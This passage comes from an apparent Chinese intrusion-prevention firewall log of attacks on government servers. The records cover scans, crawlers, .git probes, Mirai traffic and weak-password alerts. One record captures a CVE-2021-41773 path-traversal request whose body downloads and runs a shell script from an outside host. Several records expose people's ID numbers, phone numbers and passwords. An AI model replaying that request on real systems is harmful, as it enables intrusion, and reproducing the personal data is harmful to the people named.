zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
,{"LogType":"1","ID":"1766","UserID":"917506","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":49781,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T17:38:20\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.238\",\"User\":\"15.235.224.238\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
,{"LogType":"1","ID":"1766","UserID":"1376258","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":45824,\"DestPort\":8180,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":23412,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Web用户弱口令尝试(POST)\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:38:17\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"211.144.139.134\",\"User\":\"211.144.139.134\",\"DestIPAddr\":\"121.30.199.77\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.77:8180\",\"HttpFirstLine\":\"\/api\/base\/api\/accept\/accept\/receive\",\"Payload\":\"{\\\"data\\\":[{\\\"item\\\":{\\\"acceptDate\\\":\\\"2025-02-26 13:40:09\\\",\\\"acceptPersonName\\\":\\\"\\\\e5\\\\bc\\\\a0\\\\e7\\\\a7\\\\80\\\\e7\\\\8e\\\\b2\\\",\\\"applyDate\\\":\\\"2025-02-26 13:40:02\\\",\\\"applyIdNo\\\":\\\"14022620001112794X\\\",\\\"applyIdType\\\":\\\"\\\\e8\\\\ba\\\\ab\\\\e4\\\\bb\\\\bd\\\\e8\\\\af\\\\81\\\",\\\"applyMobile\\\":\\\"15235239806\\\",\\\"applyName\\\":\\\"\\\\e6\\\\9d\\\\8e\\\\e6\\\\85\\\\a7\\\",\\\"charge\\\":1,\\\"finish\\\":1,\\\"finishDate\\\":\\\"2025-02-26 16:40:09\\\",\\\"finishStatus\\\":\\\"\\\\e5\\\\87\\\\86\\\\e4\\\\ba\\\\88\\\\e8\\\\ae\\\\b8\\\\e5\\\\8f\\\\af\\\",\\\"itemCode\\\":\\\"11140213MB196264XP400012301400001\\\",\\\"itemName\\\":\\\"\\\\e6\\\\8a\\\\a4\\\\e5\\\\a3\\\\ab\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e9\\\\a6\\\\96\\\\e6\\\\ac\\\\a1\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\",\\\"limitDays\\\":1,\\\"limitStatus\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"password\\\":\\\"840855\\\",\\\"postAddress\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postName\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postPhone\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"receiveType\\\":\\\"\\\\e7\\\\aa\\\\97\\\\e5\\\\8f\\\\a3\\\\e9\\\\a2\\\\86\\\\e5\\\\8f\\\\96\\\",\\\"serviceObject\\\":\\\"\\\\e8\\\\87\\\\aa\\\\e7\\\\84\\\\b6\\\\e4\\\\ba\\\\ba\\\",\\\"status\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"sym\\\":\\\"14020078000020250226000012\\\",\\\"title\\\":\\\"\\\\e6\\\\8a\\\\a4\\\\e5\\\\a3\\\\ab\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e9\\\\a6\\\\96\\\\e6\\\\ac\\\\a1\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\"},\\\"stepIns\\\":[{\\\"descr\\\":\\\"\\\\e5\\\\90\\\\8c\\\\e6\\\\84\\\\8f\\\",\\\"endDate\\\":\\\"2025-02-26 13:40:16\\\",\\\"limitDays\\\":1,\\\"limitStat\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"WeakPassword\",\"MethodSubNameCN\":\"弱密码\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
,{"LogType":"1","ID":"1766","UserID":"983042","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":46446,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":45845,\"Severity\":60,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"访问敏感文件.git_config通信流量\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T17:36:09\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"35.216.149.150\",\"User\":\"35.216.149.150\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80\",\"HttpFirstLine\":\"\/.git\/config\",\"Payload\":\"GET \/.git\/config HTTP\/1.1\\\\0d\\\\0aHost: 121.30.199.80\\\\0d\\\\0aUser-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko\/20100101 Firefox\/103.0 abuse.xmco.fr\\\\0d\\\\0aAccept-Encoding: gzip\\\\0d\\\\0aConnection: close\\\\0d\\\\0a\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"SensitiveInfo\",\"MethodSubNameCN\":\"敏感信息泄露\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
,{"LogType":"1","ID":"1766","UserID":"1441794","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":35918,\"DestPort\":8180,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":23412,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Web用户弱口令尝试(POST)\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:37:01\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"211.144.139.134\",\"User\":\"211.144.139.134\",\"DestIPAddr\":\"121.30.199.77\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.77:8180\",\"HttpFirstLine\":\"\/api\/base\/api\/accept\/accept\/receive\",\"Payload\":\"{\\\"data\\\":[{\\\"item\\\":{\\\"acceptDate\\\":\\\"2025-02-26 13:39:01\\\",\\\"acceptPersonName\\\":\\\"\\\\e4\\\\b9\\\\94\\\\e6\\\\99\\\\93\\\\e8\\\\8a\\\\b1\\\",\\\"applyDate\\\":\\\"2025-02-26 13:38:54\\\",\\\"applyIdNo\\\":\\\"140202621214309\\\",\\\"applyIdType\\\":\\\"\\\\e8\\\\ba\\\\ab\\\\e4\\\\bb\\\\bd\\\\e8\\\\af\\\\81\\\",\\\"applyMobile\\\":\\\"13015391758\\\",\\\"applyName\\\":\\\"\\\\e6\\\\a2\\\\81\\\\e5\\\\bb\\\\ba\\\\e5\\\\b9\\\\b3\\\",\\\"charge\\\":1,\\\"finish\\\":1,\\\"finishDate\\\":\\\"2024-04-29 16:39:01\\\",\\\"finishStatus\\\":\\\"\\\\e5\\\\87\\\\86\\\\e4\\\\ba\\\\88\\\\e8\\\\ae\\\\b8\\\\e5\\\\8f\\\\af\\\",\\\"itemCode\\\":\\\"11140200MB19366520314012300500003\\\",\\\"itemName\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\a4\\\\9a\\\\e6\\\\9c\\\\ba\\\\e6\\\\9e\\\\84\\\\e5\\\\a4\\\\87\\\\e6\\\\a1\\\\88\\\\ef\\\\bc\\\\89\\\",\\\"limitDays\\\":1,\\\"limitStatus\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"password\\\":\\\"306640\\\",\\\"postAddress\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postName\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postPhone\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"receiveType\\\":\\\"\\\\e7\\\\aa\\\\97\\\\e5\\\\8f\\\\a3\\\\e9\\\\a2\\\\86\\\\e5\\\\8f\\\\96\\\",\\\"serviceObject\\\":\\\"\\\\e8\\\\87\\\\aa\\\\e7\\\\84\\\\b6\\\\e4\\\\ba\\\\ba\\\",\\\"status\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"sym\\\":\\\"14020078000020250226000011\\\",\\\"title\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\a4\\\\9a\\\\e6\\\\9c\\\\ba\\\\e6\\\\9e\\\\84\\\\e5\\\\a4\\\\87\\\\e6\\\\a1\\\\88\\\\ef\\\\bc\\\\89\\\"},\\\"\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"WeakPassword\",\"MethodSubNameCN\":\"弱密码\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
,{"LogType":"1","ID":"1766","UserID":"1048578","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":35580,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":35419,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"僵尸网络:Mirai_2.0\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T17:30:49\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"196.251.85.250\",\"User\":\"196.251.85.250\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80:80\",\"HttpFirstLine\":\"\/login.rsp\",\"Payload\":\" Hello World\\\\0d\\\\0a\",\"MethodName\":\"MalwareTraffic\",\"MethodNameCN\":\"恶意流量\",\"MethodSubName\":\"BotnetTraffic\",\"MethodSubNameCN\":\"僵尸网络流量\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
,{"LogType":"1","ID":"1766","UserID":"1507330","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":45680,\"DestPort\":8180,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":23412,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Web用户弱口令尝试(POST)\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:33:25\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"211.144.139.134\",\"User\":\"211.144.139.134\",\"DestIPAddr\":\"121.30.199.77\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.77:8180\",\"HttpFirstLine\":\"\/api\/base\/api\/accept\/accept\/receive\",\"Payload\":\"{\\\"data\\\":[{\\\"item\\\":{\\\"acceptDate\\\":\\\"2025-02-26 15:35:25\\\",\\\"acceptPersonName\\\":\\\"\\\\e5\\\\bc\\\\a0\\\\e7\\\\a7\\\\80\\\\e7\\\\8e\\\\b2\\\",\\\"applyDate\\\":\\\"2025-02-26 15:35:18\\\",\\\"applyIdNo\\\":\\\"140211198603214428\\\",\\\"applyIdType\\\":\\\"\\\\e8\\\\ba\\\\ab\\\\e4\\\\bb\\\\bd\\\\e8\\\\af\\\\81\\\",\\\"applyMobile\\\":\\\"13546072988\\\",\\\"applyName\\\":\\\"\\\\e9\\\\9f\\\\a9\\\\e7\\\\8e\\\\89\\\\e5\\\\a8\\\\9f\\\",\\\"charge\\\":1,\\\"finish\\\":1,\\\"finishDate\\\":\\\"2023-09-11 16:35:25\\\",\\\"finishStatus\\\":\\\"\\\\e5\\\\87\\\\86\\\\e4\\\\ba\\\\88\\\\e8\\\\ae\\\\b8\\\\e5\\\\8f\\\\af\\\",\\\"itemCode\\\":\\\"11140213MB196264XP400012301200003\\\",\\\"itemName\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\a4\\\\9a\\\\e6\\\\9c\\\\ba\\\\e6\\\\9e\\\\84\\\\e5\\\\a4\\\\87\\\\e6\\\\a1\\\\88\\\\ef\\\\bc\\\\89\\\",\\\"limitDays\\\":1,\\\"limitStatus\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"password\\\":\\\"747501\\\",\\\"postAddress\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postName\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postPhone\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"receiveType\\\":\\\"\\\\e7\\\\aa\\\\97\\\\e5\\\\8f\\\\a3\\\\e9\\\\a2\\\\86\\\\e5\\\\8f\\\\96\\\",\\\"serviceObject\\\":\\\"\\\\e8\\\\87\\\\aa\\\\e7\\\\84\\\\b6\\\\e4\\\\ba\\\\ba\\\",\\\"status\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"sym\\\":\\\"14020078000020250226000009\\\",\\\"title\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\a4\\\\9a\\\\e6\\\\9c\\\\ba\\\\e6\\\\9e\\\\84\\\\e5\\\\a4\\\\87\\\\e6\\\\a1\\\\88\\\\ef\\\\bc\\\\89\\\"\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"WeakPassword\",\"MethodSubNameCN\":\"弱密 码\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
,{"LogType":"1","ID":"1766","UserID":"1114114","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":43464,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫:Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T17:12:12\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.70\",\"User\":\"111.225.148.70\",\"DestIPAddr\":\"121.30.199.82\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" pcq.datong12380.gov.cn\",\"HttpFirstLine\":\"\/robots.txt\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
,{"LogType":"1","ID":"1766","UserID":"1572866","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":60256,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫:Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:15:34\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.194\",\"User\":\"111.225.148.194\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" www.dtdj.gov.cn\",\"HttpFirstLine\":\"\/mobile\/view\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
,{"LogType":"1","ID":"1766","UserID":"1179650","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":24756,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫:Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:45:27\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.30\",\"User\":\"111.225.148.30\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" www.dtdj.gov.cn\",\"HttpFirstLine\":\"\/mobile\/view\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
,{"LogType":"1","ID":"1766","UserID":"1638402","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":57098,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫:Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:15:33\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.194\",\"User\":\"111.225.148.194\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" www.dtdj.gov.cn\",\"HttpFirstLine\":\"\/mobile\/article_list.htm?itemId=139&parentId=0\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
,{"LogType":"1","ID":"1766","UserID":"1245186","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":22712,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫:Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:45:26\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.30\",\"User\":\"111.225.148.30\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" www.dtdj.gov.cn\",\"HttpFirstLine\":\"\/mobile\/article_list.htm?itemId=115&parentId=0\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
,{"LogType":"1","ID":"1766","UserID":"1703938","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":41308,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":44259,\"Severity\":60,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"CVE-2021-41773_Apache_HTTP_Server·径遍历漏洞\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:14:36\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"43.143.211.222\",\"User\":\"43.143.211.222\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"CVE-2021-41773\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79:80\",\"HttpFirstLine\":\"\/cgi-bin\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/bin\/sh\",\"Payload\":\"POST \/cgi-bin\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/bin\/sh HTTP\/1.1\\\\0d\\\\0aHost: 121.30.199.79:80\\\\0d\\\\0aAccept: *\/*\\\\0d\\\\0aUpgrade-Insecure-Requests: 1\\\\0d\\\\0aUser-Agent: Custom-AsyncHttpClient\\\\0d\\\\0aConnection: keep-alive\\\\0d\\\\0aContent-Type: text\/plain\\\\0d\\\\0aContent-Length: 105\\\\0d\\\\0a\\\\0d\\\\0aX=$(curl http:\/\/196.251.88.141\/sh || wget http:\/\/196.251.88.141\/sh -O-); echo \\\"$X\\\" | sh -s apache.selfrep\",\"MethodName\":\"Vulnerability\",\"MethodNameCN\":\"漏洞\",\"MethodSubName\":\"DirectoryTraversal\",\"MethodSubNameCN\":\"目录遍历\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
